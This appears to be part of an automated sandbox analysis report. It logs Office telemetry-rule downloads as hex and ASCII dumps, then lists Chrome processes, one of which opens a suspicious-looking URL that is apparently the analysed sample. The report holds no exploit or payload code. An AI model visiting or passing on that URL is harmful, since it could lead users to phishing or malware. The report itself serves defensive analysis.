72 75 65 22 3e 0d 0a 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                            Session IDSource IPSource PortDestination IPDestination Port
                            40192.168.2.44980213.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:17:50 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-10-10 08:17:50 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 08:17:50 GMT
                            Content-Type: text/xml
                            Content-Length: 407
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                            ETag: "0x8DC582BBAD04B7B"
                            x-ms-request-id: c373b686-b01e-001e-567b-1a0214000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241010T081750Z-185b7d577bdgsgcm5251kab51w00000001wg000000001v55
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-10-10 08:17:50 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                            Session IDSource IPSource PortDestination IPDestination Port
                            41192.168.2.44980413.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:17:50 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-10-10 08:17:50 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 08:17:50 GMT
                            Content-Type: text/xml
                            Content-Length: 486
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                            ETag: "0x8DC582BB344914B"
                            x-ms-request-id: d01f8df5-c01e-007a-10fd-19b877000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241010T081750Z-185b7d577bdqh8w7ruf4kwucmw00000001y000000000cwfc
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-10-10 08:17:50 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            42192.168.2.44980313.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:17:50 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-10-10 08:17:50 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 08:17:50 GMT
                            Content-Type: text/xml
                            Content-Length: 427
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                            ETag: "0x8DC582BA310DA18"
                            x-ms-request-id: 38c0e901-901e-0016-3f33-1aefe9000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241010T081750Z-185b7d577bdvdf6b7wzrpm3w2w00000001wg000000007gsm
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-10-10 08:17:50 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                            Session IDSource IPSource PortDestination IPDestination Port
                            43192.168.2.44980713.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:17:51 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-10-10 08:17:52 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 08:17:51 GMT
                            Content-Type: text/xml
                            Content-Length: 469
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                            ETag: "0x8DC582BBA701121"
                            x-ms-request-id: 797b9b47-101e-005a-1e2f-1a882b000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241010T081751Z-185b7d577bdqh8w7ruf4kwucmw000000020g000000006vhb
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-10-10 08:17:52 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            44192.168.2.44980813.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:17:51 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-10-10 08:17:52 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 08:17:51 GMT
                            Content-Type: text/xml
                            Content-Length: 477
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                            ETag: "0x8DC582BB8CEAC16"
                            x-ms-request-id: aa894e1a-201e-0000-7cf8-19a537000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241010T081751Z-185b7d577bd787g6hpze00e34800000001gg00000000gqzk
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-10-10 08:17:52 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            45192.168.2.44980913.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:17:51 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-10-10 08:17:52 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 08:17:51 GMT
                            Content-Type: text/xml
                            Content-Length: 415
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                            ETag: "0x8DC582BA41997E3"
                            x-ms-request-id: e268cc1a-b01e-001e-5327-1a0214000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241010T081751Z-185b7d577bdgsgcm5251kab51w00000001u0000000006yk5
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-10-10 08:17:52 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                            Session IDSource IPSource PortDestination IPDestination Port
                            46192.168.2.44981313.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:17:51 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-10-10 08:17:52 UTC470INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 08:17:51 GMT
                            Content-Type: text/xml
                            Content-Length: 464
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                            ETag: "0x8DC582B97FB6C3C"
                            x-ms-request-id: a5ffddab-301e-003f-58cf-19266f000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241010T081751Z-185b7d577bd8m52vbwet1cqbbw000000028g00000000d91b
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-10-10 08:17:52 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                            Click to jump to process

                            Click to jump to process

                            Click to jump to process

                            Target ID:0
                            Start time:04:16:48
                            Start date:10/10/2024
                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                            Imagebase:0x7ff76e190000
                            File size:3'242'272 bytes
                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:false

                            Target ID:2
                            Start time:04:16:51
                            Start date:10/10/2024
                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1996,i,10250477170695779646,1042242611913617245,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                            Imagebase:0x7ff76e190000
                            File size:3'242'272 bytes
                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:false

                            Target ID:3
                            Start time:04:16:54
                            Start date:10/10/2024
                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://or4t.iednationusa.com/sYyRdjOU"
                            Imagebase:0x7ff76e190000
                            File size:3'242'272 bytes
                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            No disassembly